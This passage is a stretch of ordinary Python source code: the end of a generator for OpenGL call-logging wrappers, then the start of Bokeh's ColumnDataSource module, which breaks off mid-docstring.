"glGetTexParameterIuiv": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter")}, argOutPrints = {2: pointer(size = "getTextureParamQueryNumArgsOut(pname)")}),
"glGetTexLevelParameterfv": LogSpec({0: enum("TextureTarget"), 2: enum("TextureLevelParameter")}, argOutPrints = {3: pointer(size = "1")}),
"glGetTexLevelParameteriv": LogSpec({0: enum("TextureTarget"), 2: enum("TextureLevelParameter")}, argOutPrints = {3: pointer(size = "1")}),
# "glGetUniformfv":
# "glGetUniformiv":
"glGetUniformIndices": LogSpec({2: pointer(size = "uniformCount")}, argOutPrints = {3: pointer(size = "uniformCount")}),
"glGetVertexAttribfv": LogSpec({1: enum("VertexAttribParameterName")}, argOutPrints = {2: pointer(size = "getAttributeQueryNumArgsOut(pname)")}),
"glGetVertexAttribiv": LogSpec({1: enum("VertexAttribParameterName")}, argOutPrints = {2: pointer(size = "getAttributeQueryNumArgsOut(pname)")}),
"glGetVertexAttribIiv": LogSpec({1: enum("VertexAttribParameterName")}, argOutPrints = {2: pointer(size = "getAttributeQueryNumArgsOut(pname)")}),
"glGetVertexAttribIuiv": LogSpec({1: enum("VertexAttribParameterName")}, argOutPrints = {2: pointer(size = "getAttributeQueryNumArgsOut(pname)")}),
# "glGetVertexAttribPointerv":
"glHint": LogSpec({0: enum("Hint"), 1: enum("HintMode")}),
"glIsEnabled": LogSpec({0: enum("EnableCap")}),
"glIsEnabledi": LogSpec({0: enum("IndexedEnableCap")}),
"glPixelStorei": LogSpec({0: enum("PixelStoreParameter")}),
"glReadBuffer": LogSpec({0: enum("DrawReadBuffer")}),
"glReadPixels": LogSpec({4: enum("UncompressedTextureFormat"), 5: enum("Type")}),
"glRenderbufferStorage": LogSpec({0: enum("FramebufferTarget"), 1: enum("UncompressedTextureFormat")}),
"glRenderbufferStorageMultisample": LogSpec({0: enum("FramebufferTarget"), 2: enum("UncompressedTextureFormat")}),
"glStencilFunc": LogSpec({0: enum("CompareFunc")}),
"glStencilFuncSeparate": LogSpec({0: enum("Face"), 1: enum("CompareFunc")}),
"glStencilMaskSeparate": LogSpec({0: enum("Face")}),
"glStencilOp": LogSpec({0: enum("StencilOp"), 1: enum("StencilOp"), 2: enum("StencilOp")}),
"glStencilOpSeparate": LogSpec({0: enum("Face"), 1: enum("StencilOp"), 2: enum("StencilOp"), 3: enum("StencilOp")}),
"glTexImage1D": LogSpec({0: enum("TextureTarget"), 2: enum("UncompressedTextureFormat"), 5: enum("UncompressedTextureFormat"), 6: enum("Type")}),
"glTexImage2D": LogSpec({0: enum("TextureTarget"), 2: enum("UncompressedTextureFormat"), 6: enum("UncompressedTextureFormat"), 7: enum("Type")}),
"glTexImage2DMultisample": LogSpec({0: enum("TextureTarget"), 2: enum("UncompressedTextureFormat"), 5: enum("Boolean")}),
"glTexImage3D": LogSpec({0: enum("TextureTarget"), 2: enum("UncompressedTextureFormat"), 7: enum("UncompressedTextureFormat"), 8: enum("Type")}),
"glTexStorage2D": LogSpec({0: enum("TextureTarget"), 2: enum("TextureFormat")}),
"glTexStorage3D": LogSpec({0: enum("TextureTarget"), 2: enum("TextureFormat")}),
"glTexStorage2DMultisample": LogSpec({0: enum("TextureTarget"), 2: enum("UncompressedTextureFormat"), 5: enum("Boolean")}),
"glTexStorage3DMultisample": LogSpec({0: enum("TextureTarget"), 2: enum("UncompressedTextureFormat"), 6: enum("Boolean")}),
# \todo [2012-03-08 pyry] Pointer values..
"glTexParameterf": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter")}),
"glTexParameteri": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter"), 2: lambda name: "getTextureParameterValueStr(pname, %s)" % name}),
"glTexParameterfv": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter"), 2: pointer(size = "getTextureParamNumArgs(pname)")}),
"glTexParameteriv": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter"), 2: pointer(size = "getTextureParamNumArgs(pname)")}),
"glTexParameterIiv": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter"), 2: pointer(size = "getTextureParamNumArgs(pname)")}),
"glTexParameterIuiv": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter"), 2: pointer(size = "getTextureParamNumArgs(pname)")}),
"glSamplerParameterf": LogSpec({1: enum("TextureParameter")}),
"glSamplerParameteri": LogSpec({1: enum("TextureParameter"), 2: lambda name: "getTextureParameterValueStr(pname, %s)" % name}),
"glSamplerParameterfv": LogSpec({1: enum("TextureParameter"), 2: pointer(size = "getTextureParamNumArgs(pname)")}),
"glSamplerParameteriv": LogSpec({1: enum("TextureParameter"), 2: pointer(size = "getTextureParamNumArgs(pname)")}),
"glSamplerParameterIiv": LogSpec({1: enum("TextureParameter"), 2: pointer(size = "getTextureParamNumArgs(pname)")}),
"glSamplerParameterIuiv": LogSpec({1: enum("TextureParameter"), 2: pointer(size = "getTextureParamNumArgs(pname)")}),
"glTexSubImage1D": LogSpec({0: enum("TextureTarget"), 4: enum("UncompressedTextureFormat"), 5: enum("Type")}),
"glTexSubImage2D": LogSpec({0: enum("TextureTarget"), 6: enum("UncompressedTextureFormat"), 7: enum("Type")}),
"glTexSubImage3D": LogSpec({0: enum("TextureTarget"), 8: enum("UncompressedTextureFormat"), 9: enum("Type")}),
"glUniform1fv": LogSpec({2: pointer(size = "(count * 1)")}),
"glUniform1iv": LogSpec({2: pointer(size = "(count * 1)")}),
"glUniform1uiv": LogSpec({2: pointer(size = "(count * 1)")}),
"glUniform2fv": LogSpec({2: pointer(size = "(count * 2)")}),
"glUniform2iv": LogSpec({2: pointer(size = "(count * 2)")}),
"glUniform2uiv": LogSpec({2: pointer(size = "(count * 2)")}),
"glUniform3fv": LogSpec({2: pointer(size = "(count * 3)")}),
"glUniform3iv": LogSpec({2: pointer(size = "(count * 3)")}),
"glUniform3uiv": LogSpec({2: pointer(size = "(count * 3)")}),
"glUniform4fv": LogSpec({2: pointer(size = "(count * 4)")}),
"glUniform4iv": LogSpec({2: pointer(size = "(count * 4)")}),
"glUniform4uiv": LogSpec({2: pointer(size = "(count * 4)")}),
"glUniformMatrix2fv": LogSpec({3: pointer(size = "(count * 2*2)")}),
"glUniformMatrix3fv": LogSpec({3: pointer(size = "(count * 3*3)")}),
"glUniformMatrix4fv": LogSpec({3: pointer(size = "(count * 4*4)")}),
"glUniformMatrix2x3fv": LogSpec({3: pointer(size = "(count * 2*3)")}),
"glUniformMatrix2x4fv": LogSpec({3: pointer(size = "(count * 2*4)")}),
"glUniformMatrix3x2fv": LogSpec({3: pointer(size = "(count * 3*2)")}),
"glUniformMatrix3x4fv": LogSpec({3: pointer(size = "(count * 3*4)")}),
"glUniformMatrix4x2fv": LogSpec({3: pointer(size = "(count * 4*2)")}),
"glUniformMatrix4x3fv": LogSpec({3: pointer(size = "(count * 4*3)")}),
"glUseProgramStages": LogSpec({1: enum("ShaderTypeMask")}),
"glPatchParameteri": LogSpec({0: enum("PatchParam")}),
"glProgramParameteri": LogSpec({1: enum("ProgramParam")}),
"glProgramUniform1fv": LogSpec({3: pointer(size = "(count * 1)")}),
"glProgramUniform1iv": LogSpec({3: pointer(size = "(count * 1)")}),
"glProgramUniform1uiv": LogSpec({3: pointer(size = "(count * 1)")}),
"glProgramUniform2fv": LogSpec({3: pointer(size = "(count * 2)")}),
"glProgramUniform2iv": LogSpec({3: pointer(size = "(count * 2)")}),
"glProgramUniform2uiv": LogSpec({3: pointer(size = "(count * 2)")}),
"glProgramUniform3fv": LogSpec({3: pointer(size = "(count * 3)")}),
"glProgramUniform3iv": LogSpec({3: pointer(size = "(count * 3)")}),
"glProgramUniform3uiv": LogSpec({3: pointer(size = "(count * 3)")}),
"glProgramUniform4fv": LogSpec({3: pointer(size = "(count * 4)")}),
"glProgramUniform4iv": LogSpec({3: pointer(size = "(count * 4)")}),
"glProgramUniform4uiv": LogSpec({3: pointer(size = "(count * 4)")}),
"glProgramUniformMatrix2fv": LogSpec({4: pointer(size = "(count * 2*2)")}),
"glProgramUniformMatrix3fv": LogSpec({4: pointer(size = "(count * 3*3)")}),
"glProgramUniformMatrix4fv": LogSpec({4: pointer(size = "(count * 4*4)")}),
"glProgramUniformMatrix2x3fv": LogSpec({4: pointer(size = "(count * 2*3)")}),
"glProgramUniformMatrix2x4fv": LogSpec({4: pointer(size = "(count * 2*4)")}),
"glProgramUniformMatrix3x2fv": LogSpec({4: pointer(size = "(count * 3*2)")}),
"glProgramUniformMatrix3x4fv": LogSpec({4: pointer(size = "(count * 3*4)")}),
"glProgramUniformMatrix4x3fv": LogSpec({4: pointer(size = "(count * 4*3)")}),
"glProgramUniformMatrix4x2fv": LogSpec({4: pointer(size = "(count * 4*2)")}),
"glProvokingVertex": LogSpec({0: enum("ProvokingVertex")}),
"glVertexAttrib1fv": LogSpec({1: pointer(size = "1")}),
"glVertexAttrib2fv": LogSpec({1: pointer(size = "2")}),
"glVertexAttrib3fv": LogSpec({1: pointer(size = "3")}),
"glVertexAttrib4fv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib1sv": LogSpec({1: pointer(size = "1")}),
"glVertexAttrib2sv": LogSpec({1: pointer(size = "2")}),
"glVertexAttrib3sv": LogSpec({1: pointer(size = "3")}),
"glVertexAttrib4sv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib1dv": LogSpec({1: pointer(size = "1")}),
"glVertexAttrib2dv": LogSpec({1: pointer(size = "2")}),
"glVertexAttrib3dv": LogSpec({1: pointer(size = "3")}),
"glVertexAttrib4dv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4bv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4iv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4ubv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4usv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4uiv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4Nbv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4Nsv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4Niv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4Nubv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4Nusv": LogSpec({1: pointer(size = "4")}),
"glVertexAttrib4Nuiv": LogSpec({1: pointer(size = "4")}),
"glVertexAttribI1iv": LogSpec({1: pointer(size = "1")}),
"glVertexAttribI2iv": LogSpec({1: pointer(size = "2")}),
"glVertexAttribI3iv": LogSpec({1: pointer(size = "3")}),
"glVertexAttribI4iv": LogSpec({1: pointer(size = "4")}),
"glVertexAttribI1uiv": LogSpec({1: pointer(size = "1")}),
"glVertexAttribI2uiv": LogSpec({1: pointer(size = "2")}),
"glVertexAttribI3uiv": LogSpec({1: pointer(size = "3")}),
"glVertexAttribI4uiv": LogSpec({1: pointer(size = "4")}),
"glVertexAttribI4bv": LogSpec({1: pointer(size = "4")}),
"glVertexAttribI4sv": LogSpec({1: pointer(size = "4")}),
"glVertexAttribI4ubv": LogSpec({1: pointer(size = "4")}),
"glVertexAttribI4usv": LogSpec({1: pointer(size = "4")}),
"glVertexAttribPointer": LogSpec({2: enum("Type")}),
"glVertexAttribIPointer": LogSpec({2: enum("Type")}),
"glVertexAttribFormat": LogSpec({2: enum("Type")}),
"glVertexAttribIFormat": LogSpec({2: enum("Type")}),
"glInvalidateFramebuffer": LogSpec({0: enum("FramebufferTarget"), 2: enumPointer("InvalidateAttachment", "numAttachments")}),
"glInvalidateSubFramebuffer": LogSpec({0: enum("FramebufferTarget"), 2: enumPointer("InvalidateAttachment", "numAttachments")}),
"glMapBufferRange": LogSpec({0: enum("BufferTarget"), 3: enum("BufferMapFlags")}),
"glUnmapBuffer": LogSpec({0: enum("BufferTarget")}),
"glFlushMappedBufferRange": LogSpec({0: enum("BufferTarget")}),
"glMemoryBarrier": LogSpec({0: enum("MemoryBarrierFlags")}),
"glBindImageTexture": LogSpec({5: enum("ImageAccess"), 6: enum("UncompressedTextureFormat")}),
"glGetProgramResourceIndex": LogSpec({1: enum("ProgramInterface")}),
"glGetProgramResourceiv":
LogSpec(
{
1: enum("ProgramInterface"),
4: enumPointer("ProgramResourceProperty", "propCount")
},
argOutPrints =
{
6: pointer(size = "1"),
7: pointer(size = "((length == DE_NULL) ? (bufSize) : ((bufSize < *length) ? (bufSize) : (*length)))")
}),
"glDebugMessageInsert": LogSpec({0: enum("DebugMessageSource"), 1: enum("DebugMessageType"), 3: enum("DebugMessageSeverity")}),
"glDebugMessageControl": LogSpec({0: enum("DebugMessageSource"), 1: enum("DebugMessageType"), 2: enum("DebugMessageSeverity"), 4: pointer(size = "(count)")}),
"glDebugMessageCallback": LogSpec({0: fnPointer, 1: voidPointer}),
"glPushDebugGroup": LogSpec({0: enum("DebugMessageSource")}),
"glTexBuffer": LogSpec({0: enum("BufferTarget"), 1: enum("UncompressedTextureFormat")}),
"glTexBufferRange": LogSpec({0: enum("BufferTarget"), 1: enum("UncompressedTextureFormat")}),
}
def glwPrefix (string):
return re.sub(r'\bGL', 'glw::GL', string)
def prefixedParams (command):
if len(command.params) > 0:
return ", ".join(glwPrefix(param.declaration) for param in command.params)
else:
return "void"
def commandLogWrapperMemberDecl (command):
return "%s\t%s\t(%s);" % (glwPrefix(command.type), command.name, prefixedParams(command))
def getVarDefaultPrint (type, varName):
if re.match(r'^const +GLchar *\*$', type):
return "getStringStr(%s)" % varName
elif re.match(r'(GLubyte|GLbyte|GLenum|GLushort|GLbitfield|\*)$', type):
return "toHex(%s)" % varName
elif type == 'GLboolean':
return "getBooleanStr(%s)" % varName
elif re.match(r'^(const +)?.+ *\*$', type) and not re.match(r'^(const +)?void *\*$', type):
# non-void pointer type, always cast to void* to avoid unforeseen consequences of
# implicit assumptions (such as char* should be printed as a zero-terminated string)
# \note use static_cast to break the build if function pointer is supplied
return "toHex(reinterpret_cast<deUintptr>(static_cast<const void*>(%s)))" % varName
else:
return varName
def commandLogWrapperMemberDef (command):
src = ""
try:
logSpec = CALL_LOG_SPECS[command.name]
except KeyError:
logSpec = None
src += "\n"
src += "%s CallLogWrapper::%s (%s)\n{\n" % (glwPrefix(command.type), command.name, prefixedParams(command))
# Append paramemetrs
callPrintItems = ["\"%s(\"" % command.name]
for paramNdx, param in enumerate(command.params):
if paramNdx > 0:
callPrintItems.append("\", \"")
if logSpec and paramNdx in logSpec.argInPrints:
callPrintItems.append(logSpec.argInPrints[paramNdx](param.name))
else:
callPrintItems.append(getVarDefaultPrint(param.type, param.name))
callPrintItems += ["\");\"", "TestLog::EndMessage"]
src += "\tif (m_enableLog)\n"
src += "\t\tm_log << TestLog::Message << %s;\n" % " << ".join(callPrintItems)
callStr = "m_gl.%s(%s)" % (getFunctionMemberName(command.name), ", ".join([p.name for p in command.params]))
isVoid = command.type == 'void'
if isVoid:
src += "\t%s;\n" % callStr
else:
src += "\t%s returnValue = %s;\n" % (glwPrefix(command.type), callStr)
if logSpec and len(logSpec.argOutPrints) > 0:
# Print values returned in pointers
src += "\tif (m_enableLog)\n"
printouts = ""
numPrintouts = 0
for paramNdx, param in enumerate(command.params):
if paramNdx in logSpec.argOutPrints:
printouts += "\t\tm_log << TestLog::Message << \"// %s = \" << %s << TestLog::EndMessage;\n" % (param.name, logSpec.argOutPrints[paramNdx](param.name))
numPrintouts += 1
# If print handlers do not match the actual command, that is very likely an error. Check
# print handlers is a subset of all arguments.
if numPrintouts == 0 or len(set(logSpec.argOutPrints.keys()) - set(range(len(command.params)))) > 0:
raise Exception("Invalid print handlers when processing command %s" % command.name)
if numPrintouts != 1:
src += "\t{\n"
src += printouts
if numPrintouts != 1:
src += "\t}\n"
if not isVoid:
# Print return value
returnPrint = getVarDefaultPrint(command.type, "returnValue")
if logSpec and logSpec.returnPrint:
returnPrint = logSpec.returnPrint("returnValue")
src += "\tif (m_enableLog)\n"
src += "\t\tm_log << TestLog::Message << \"// \" << %s << \" returned\" << TestLog::EndMessage;\n" % returnPrint
src += "\treturn returnValue;\n"
src += "}"
return src
def genCallLogWrapper (iface):
genCommandList(iface, commandLogWrapperMemberDecl, OPENGL_DIR, "gluCallLogWrapperApi.inl", True)
genCommandList(iface, commandLogWrapperMemberDef, OPENGL_DIR, "gluCallLogWrapper.inl", False)
if __name__ == "__main__":
genCallLogWrapper(getHybridInterface())
| |
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
import logging
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
import warnings
# External imports
# Bokeh imports
from ..core.has_props import abstract
from ..core.properties import Any, Bool, ColumnData, Dict, Enum, Instance, Int, JSON, List, PandasDataFrame, PandasGroupBy, Seq, String
from ..model import Model
from ..util.dependencies import import_optional
from ..util.serialization import convert_datetime_array
from ..util.warnings import BokehUserWarning
from .callbacks import Callback, CustomJS
from .filters import Filter
from .selections import Selection, SelectionPolicy, UnionRenderers
pd = import_optional('pandas')
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
__all__ = (
'ServerSentDataSource',
'AjaxDataSource',
'CDSView',
'ColumnarDataSource',
'ColumnDataSource',
'DataSource',
'GeoJSONDataSource',
'RemoteSource',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
@abstract
class DataSource(Model):
''' A base class for data source types.
'''
selected = Instance(Selection, default=lambda: Selection(), help="""
A Selection that indicates selected indices on this ``DataSource``.
""")
callback = Instance(Callback, help="""
A callback to run in the browser whenever the selection is changed.
.. note:
This property is left for backwards compatibility, but may be deprecated
in the future. Prefer ``source.selected.js_on_change(...)`` for new code.
""")
@abstract
class ColumnarDataSource(DataSource):
''' A base class for data source types, which can be mapped onto
a columnar format.
'''
selection_policy = Instance(SelectionPolicy, default=lambda: UnionRenderers(), help="""
An instance of a ``SelectionPolicy`` that determines how selections are set.
""")
class ColumnDataSource(ColumnarDataSource):
''' Maps names of columns to sequences or arrays.
The ``ColumnDataSource`` is a fundamental data structure of Bokeh. Most
plots, data tables, etc. will be driven by a ``ColumnDataSource``.
If the ``ColumnDataSource`` initializer is called with a single argument that
can be any of the following:
* A Python ``dict`` that maps string names to sequences of values, e.g.
lists, arrays, etc.
.. code-block:: python
data = {'x': [1,2,3,4], 'y': np.ndarray([10.0, 20.0, 30.0, 40.0])}
source = ColumnDataSource(data)
.. note::
``ColumnDataSource`` only creates a shallow copy of ``data``. Use e.g.
``ColumnDataSource(copy.deepcopy(data))`` if initializing from another
``ColumnDataSource.data`` object that you want to keep independent.
* A Pandas ``DataFrame`` object
.. code-block:: python
source = ColumnDataSource(df)
In this case the CDS will have columns corresponding to the columns of
the ``DataFrame``. If the ``DataFrame`` columns have multiple levels,
they will be flattened using an underscore (e.g. level_0_col_level_1_col).
The index of the ``DataFrame`` will be flattened to an ``Index`` of tuples
if it's a ``MultiIndex``, and then reset using ``reset_index``. The result
will be a column with the same name if the index was named, or
level_0_name_level_1_name if it was a named ``MultiIndex``. If the
``Index`` did not have a name or the ``MultiIndex`` name could not be
flattened/determined, the ``reset_index`` function will name the index column
``index``, or ``level_0`` if the name ``index`` is not available.
* A Pandas ``GroupBy`` object
.. code-block:: python
group = df.groupby(('colA', 'ColB'))
In this case the CDS will have columns corresponding to the result of
calling ``group.describe()``. The ``describe`` method generates columns
for statistical measures such as ``mean`` and ``count`` for all the
non-grouped original columns. The CDS columns are formed by joining
original column names with the computed measure. For example, if a
``DataFrame`` has columns ``'year'`` and ``'mpg'``. Then passing
``df.groupby('year')`` to a CDS will result in columns such as
``'mpg_mean'``
If the ``GroupBy.describe`` result has a named index column, then
CDS will also have a column with this name. However, if the index name
(or any subname of a ``MultiIndex``) is ``None``, then the CDS will have
a column generically named ``index`` for the index.
Note this capability to adapt ``GroupBy`` objects may only work with
Pandas ``>=0.20.0``.
.. note::
There is an implicit assumption that all the columns in a given
``ColumnDataSource`` all have the same length at all times. For this
reason, it is usually preferable to update the ``.data`` property
of a data source "all at once".
'''
data = ColumnData(String, Seq(Any), help="""
Mapping of column names to sequences of data. The columns can be, e.g,
Python lists or tuples, NumPy arrays, etc.
The .data attribute can also be set from Pandas DataFrames or GroupBy
objects. In these cases, the behaviour is identical to passing the objects
to the ``ColumnDataSource`` initializer.
""").accepts(
PandasDataFrame, lambda x: ColumnDataSource._data_from_df(x)
).accepts(
PandasGroupBy, lambda x: ColumnDataSource._data_from_groupby(x)
).asserts(lambda _, data: len(set(len(x) for x in data.values())) <= 1,
lambda obj, name, data: warnings.warn(
"ColumnDataSource's columns must be of the same length. " +
"Current lengths: %s" % ", ".join(sorted(str((k, len(v))) for k, v in data.items())), BokehUserWarning))
def __init__(self, *args, **kw):
''' If called with a single argument that is a dict or
``pandas.DataFrame``, treat that implicitly as the "data" attribute.
'''
if len(args) == 1 and "data" not in kw:
kw["data"] = args[0]
# TODO (bev) invalid to pass args and "data", check and raise exception
raw_data = kw.pop("data", {})
if not isinstance(raw_data, dict):
if pd and isinstance(raw_data, pd.DataFrame):
raw_data = self._data_from_df(raw_data)
elif pd and isinstance(raw_data, pd.core.groupby.GroupBy):
raw_data = self._data_from_groupby(raw_data)
else:
raise ValueError("expected a dict or pandas.DataFrame, got %s" % raw_data)
super(ColumnDataSource, self).__init__(**kw)
self.data.update(raw_data)
@property
def column_names(self):
''' A list of the column names in this data source.
'''
return list(self.data)
@staticmethod
def _data_from_df(df):
''' Create a ``dict`` of columns from a Pandas ``DataFrame``,
suitable for creating a ColumnDataSource.
Args:
df (DataFrame) : data to convert
Returns:
dict[str, np.array]
'''
_df = df.copy()
# Flatten columns
if isinstance(df.columns, pd.MultiIndex):
try:
_df.columns = ['_'.join(col) for col in _df.columns.values]
except TypeError:
raise TypeError('Could not flatten MultiIndex columns. '
'use string column names or flatten manually')
# Transform columns CategoricalIndex in list
if isinstance(df.columns, pd.CategoricalIndex):
_df.columns = df.columns.tolist()
# Flatten index
index_name = ColumnDataSource._df_index_name(df)
if index_name == 'index':
_df.index = pd.Index(_df.index.values)
else:
_df.index = pd.Index(_df.index.values, name=index_name)
_df.reset_index(inplace=True)
tmp_data = {c: v.values for c, v in _df.iteritems()}
new_data = {}
for k, v in tmp_data.items():
new_data[k] = v
return new_data
@staticmethod
def _data_from_groupby(group):
''' Create a ``dict`` of columns from a Pandas ``GroupBy``,
suitable for creating a ``ColumnDataSource``.
The data generated is the result of running ``describe``
on the group.
Args:
group (GroupBy) : data to convert
Returns:
dict[str, np.array]
'''
return ColumnDataSource._data_from_df(group.describe())
@staticmethod
def _df_index_name(df):
''' Return the Bokeh-appropriate column name for a ``DataFrame`` index
If there is no named index, then `"index" is returned.
If there is a single named index, then ``df.index.name`` is returned.
If there is a multi-index, and the index names are all strings, then
the names are joined with '_' and the result is returned, e.g. for a
multi-index ``['ind1', 'ind2']`` the result will be "ind1_ind2".
Otherwise if any index name is not a string, the fallback name "index"
is returned.
Args:
df (DataFrame) : the ``DataFrame`` to find an index name for
Returns:
str
'''
if df.index.name:
return df.index.name
elif df.index.names:
try:
return "_".join(df.index.names)
except TypeError:
return "index"
else:
return "index"
@classmethod
def from_df(cls, data):
''' Create a ``dict`` of columns from a Pandas ``DataFrame``,
suitable for creating a ``ColumnDataSource``.
Args:
data (DataFrame) : data to convert
Returns:
dict[str, np.array]
'''
return cls._data_from_df(data)
@classmethod
def from_groupby(cls, data):
''' Create a ``dict`` of columns from a Pandas ``GroupBy``,
suitable for creating a ``ColumnDataSource``.
The data generated is the result of running ``describe``
on the group.
Args:
data (Groupby) : data to convert
Returns:
dict[str, np.array]
'''
return cls._data_from_df(data.describe())
def to_df(self):
''' Convert this data source to pandas ``DataFrame``.
Returns:
DataFrame
'''
if not pd:
raise RuntimeError('Pandas must be installed to convert to a Pandas Dataframe')
return pd.DataFrame(self.data)
def add(self, data, name=None):
''' Appends a new column of data to the data source.
Args:
data (seq) : new data to add
name (str, optional) : column name to use.
If not supplied, generate a name of the form "Series ####"
Returns:
str: the column name used
'''
if name is None:
n = len(self.data)
while "Series %d"%n in self.data:
n += 1
name = "Series %d"%n
self.data[name] = data
return name
def remove(self, name):
''' Remove a column of data.
Args:
name (str) : name of the column to remove
Returns:
None
.. note::
If the column name does not exist, a warning is issued.
'''
try:
del self.data[name]
except (ValueError, KeyError):
import warnings
warnings.warn("Unable to find column '%s' in data source" % name)
def stream(self, new_data, rollover=None):
''' Efficiently update data source columns with new append-only data.
In cases where it is necessary to update data columns in, this method
can efficiently send only the new data, instead of requiring the
entire data set to be re-sent.
Args:
new_data (dict[str, seq]) : a mapping of column names to sequences of
new data to append to each column.
All columns of the data source must be present in ``new_data``,
with identical-length append data.
rollover (int, optional) : A maximum column size, above which data
from the start of the column begins to be discarded. If None,
then columns will continue to grow unbounded (default: None)
Returns:
None
Raises:
ValueError
Example:
.. code-block:: python
source = ColumnDataSource(data=dict(foo=[], bar=[]))
# has new, identical-length updates for all columns in source
new_data = {
'foo' : [10, 20],
'bar' : [100, 200],
}
source.stream(new_data)
'''
# calls internal implementation
self._stream(new_data, rollover)
def _stream(self, new_data, rollover=None, setter=None):
''' Internal implementation to efficiently update data source columns
with new append-only data. The internal implementation adds the setter
attribute. [https://github.com/bokeh/bokeh/issues/6577]
In cases where it is necessary to update data columns in, this method
can efficiently send only the new data, instead of requiring the
entire data set to be re-sent.
Args:
new_data (dict[str, seq] or DataFrame or Series) : a mapping of
column names to sequences of new data to append to each column,
a pandas DataFrame, or a pandas Series in case of a single row -
in this case the Series index is used as column names
All columns of the data source must be present in ``new_data``,
with identical-length append data.
rollover (int, optional) : A maximum column size, above which data
from the start of the column begins to be discarded. If None,
then columns will continue to grow unbounded (default: None)
setter (ClientSession or ServerSession or None, optional) :
This is used to prevent "boomerang" updates to Bokeh apps.
(default: None)
In the context of a Bokeh server application, incoming updates
to properties will be annotated with the session that is
doing the updating. This value is propagated through any
subsequent change notifications that the update triggers.
The session can compare the event setter to itself, and
suppress any updates that originate from itself.
Returns:
None
Raises:
ValueError
Example:
.. code-block:: python
source = ColumnDataSource(data=dict(foo=[], bar=[]))
# has new, identical-length updates for all columns in source
new_data = {
'foo' : [10, 20],
'bar' : [100, 200],
}
source.stream(new_data)
'''
needs_length_check = True
if pd and isinstance(new_data, pd.Series):
new_data = new_data.to_frame().T
if pd and isinstance(new_data, pd.DataFrame):
needs_length_check = False # DataFrame lengths equal by definition
_df = new_data
newkeys = set(_df.columns)
index_name = ColumnDataSource._df_index_name(_df)
newkeys.add(index_name)
new_data = dict(_df.iteritems())
new_data[index_name] = _df.index.values
else:
newkeys = set(new_data.keys())
oldkeys = set(self.data.keys())
if newkeys != oldkeys:
missing = oldkeys - newkeys
extra = newkeys - oldkeys
if missing and extra:
raise ValueError(
"Must stream updates to all existing columns (missing: %s, extra: %s)" % (", ".join(sorted(missing)), ", ".join(sorted(extra)))
)
elif missing:
raise ValueError("Must stream updates to all existing columns (missing: %s)" % ", ".join(sorted(missing)))
else:
raise ValueError("Must stream updates to all existing columns (extra: %s)" % ", ".join(sorted(extra)))
import numpy as np
if needs_length_check:
lengths = set()
arr_types = (np.ndarray, pd.Series) if pd else np.ndarray
for k, x in new_data.items():
if isinstance(x, arr_types):
if len(x.shape) != 1:
raise ValueError("stream(...) only supports 1d sequences, got ndarray with size %r" % (x.shape,))
lengths.add(x.shape[0])
else:
lengths.add(len(x))
if len(lengths) > 1:
raise ValueError("All streaming column updates must be the same length")
# slightly awkward that we have to call convert_datetime_array here ourselves
# but the downstream code expects things to already be ms-since-epoch
for key, values in new_data.items():
if pd and isinstance(values, (pd.Series, pd.Index)):
values = values.values
old_values = self.data[key]
# Apply the transformation if the new data contains datetimes
# but the current data has already been transformed
if (isinstance(values, np.ndarray) and values.dtype.kind.lower() == 'm' and
isinstance(old_values, np.ndarray) and old_values.dtype.kind.lower() != 'm'):
new_data[key] = convert_datetime_array(values)
else:
new_data[key] = values
self.data._stream(self.document, self, new_data, rollover, setter)
def patch(self, patches, setter=None):
''' Efficiently update data source columns at specific locations
If it is only necessary to update a small subset of data in a
``ColumnDataSource``, this method can be used to efficiently update only
the subset, instead of requiring the entire data set to be sent.
This method should be passed a dictionary that maps column names to
lists of tuples that describe a patch change to apply. To replace
individual items in columns entirely, the tuples should be of the
form:
.. code-block:: python
(index, new_value) # replace a single column value
# or
(slice, new_values) # replace several column values
Values at an index or slice will be replaced with the corresponding
new values.
In the case of columns whose values are other arrays or lists, (e.g.
image or patches glyphs), it is also possible to patch "subregions".
In this case the first item of the tuple should be a whose first
element is the index of the array item in the CDS patch, and whose
subsequent elements are integer indices or slices into the array item:
.. code-block:: python
# replace the entire 10th column of the 2nd array:
+----------------- index of item in column data source
|
| +--------- row subindex into array item
| |
| | +- column subindex into array item
V V V
([2, slice(None), 10], new_values)
Imagining a list of 2d NumPy arrays, the patch above is roughly
equivalent to:
.. code-block:: python
data = [arr1, arr2, ...] # list of 2d arrays
data[2][:, 10] = new_data
There are some limitations to the kinds of slices and data that can
be accepted.
* Negative ``start``, ``stop``, or ``step`` values for slices will
result in a ``ValueError``.
* In a slice, ``start > stop`` will result in a ``ValueError``
* When patching 1d or 2d subitems, the subitems must be NumPy arrays.
* New values must be supplied as a **flattened one-dimensional array**
of the appropriate size.
Args:
patches (dict[str, list[tuple]]) : lists of patches for each column
Returns:
None
Raises:
ValueError
Example:
The following example shows how to patch entire column elements. In this case,
.. code-block:: python
source = ColumnDataSource(data=dict(foo=[10, 20, 30], bar=[100, 200, 300]))
patches = {
